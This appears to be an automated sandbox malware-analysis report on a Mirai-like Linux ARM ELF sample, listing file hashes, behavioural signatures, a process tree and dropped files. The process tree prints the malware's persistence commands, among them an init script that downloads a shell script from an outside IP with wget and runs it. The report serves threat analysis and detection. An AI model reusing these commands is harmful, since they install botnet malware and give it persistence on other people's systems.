Analysis

  • max time kernel
    149s
  • max time network
    191s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    25/11/2024, 03:03

General

  • Target

    dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf

  • Size

    193KB

  • MD5

    4a92b4798caba7746c21f0f809a41089

  • SHA1

    4958a347e371034b4740d46179e9edc0b1b01247

  • SHA256

    dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a

  • SHA512

    41a6d5a2e318f49b238690606556cfe1f9d11c6bdaf41c844dd75732dccf40c0a0b4705892ee5924364379a990bf601b90df0296206358d8f761b63ddd54ea9e

  • SSDEEP

    6144:e56CMC0WSGLa2jIyfJkDMgBH+y2bpM/9BRKeumqwQjy/:xCVSGLa+IyfJkDMXh+/Qjmqljy/

Malware Config

Signatures

  • Contacts a large (22823) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Checks mountinfo of local process 1 TTPs 1 IoCs

    Checks the mountinfo of running processes, which indicates whether it is running in a chroot jail.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/modifies systemd service files, likely to achieve persistence.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 3 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
    /tmp/dc53d8ccf7dc0ebc349a927c230bae78fede6d9bcb0aeb8748e71b9d98ab2c4a.elf
    1⤵
    • Modifies Watchdog functionality
    • Checks mountinfo of local process
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads runtime system information
    PID:652
    • /bin/sh
      /bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:656
      • /bin/systemctl
        systemctl enable custom.service
        3⤵
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:665
    • /bin/sh
      /bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      2⤵
      • File and Directory Permissions Modification
      PID:676
      • /bin/chmod
        chmod +x /etc/init.d/system
        3⤵
        • File and Directory Permissions Modification
        PID:678
    • /bin/sh
      /bin/sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
      2⤵
      • File and Directory Permissions Modification
      • Modifies init.d
      PID:681
    • /bin/sh
      /bin/sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      2⤵
      • File and Directory Permissions Modification
      PID:684
      • /bin/chmod
        chmod +x /etc/init.d/sh
        3⤵
        • File and Directory Permissions Modification
        PID:686
    • /bin/sh
      /bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:688
      • /bin/mkdir
        mkdir -p /etc/rc.d
        3⤵
        PID:690
    • /bin/sh
      /bin/sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      2⤵
      • Command and Scripting Interpreter: Unix Shell
      PID:693
      • /bin/ln
        ln -s /etc/init.d/sh /etc/rc.d/S99sh
        3⤵
        PID:694

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /boot/bootcmd

    Filesize

    109B

    MD5

    735cae7d3cbab0f59d95f84790282103

    SHA1

    1cb77931b3097f18988016c9ceba3280a5ccb2ae

    SHA256

    dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b

    SHA512

    998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

  • /etc/init.d/sh

    Filesize

    368B

    MD5

    5d64a6c10d95746b321d88f8283565ee

    SHA1

    92aeb5d86b84b38a10fa74ae7ee12333b7f58b44

    SHA256

    0ca8dcdeb338f978ce9703ff074d898dd8223859accb381d849fb180b96f7582

    SHA512

    b299a27118ffd3891d707156a09dfd3d8671a884134c1e997ce13feccd5c5547c77c737dff4b7f425a50871918ad92744d635916551b0752663dd0578af5dcce

  • /etc/init.d/system

    Filesize

    96B

    MD5

    f000251d92c773cc3ee1ca22cf5f0788

    SHA1

    e2386fe6a5f29b1e9e5ad5b38928c024f97105e6

    SHA256

    31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985

    SHA512

    0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

  • /etc/inittab

    Filesize

    101B

    MD5

    3d6b6e1b05ad5d0538ccd8804bcd279b

    SHA1

    0fc061b51c225d5bea072c939de05e8a856558bc

    SHA256

    cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5

    SHA512

    1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

  • /etc/systemd/system/custom.service

    Filesize

    290B

    MD5

    19a440fdac7f578f2fb33719698a082c

    SHA1

    ebadce21c65d05ad62a324deb39c57aecd3edf2c

    SHA256

    b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69

    SHA512

    8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb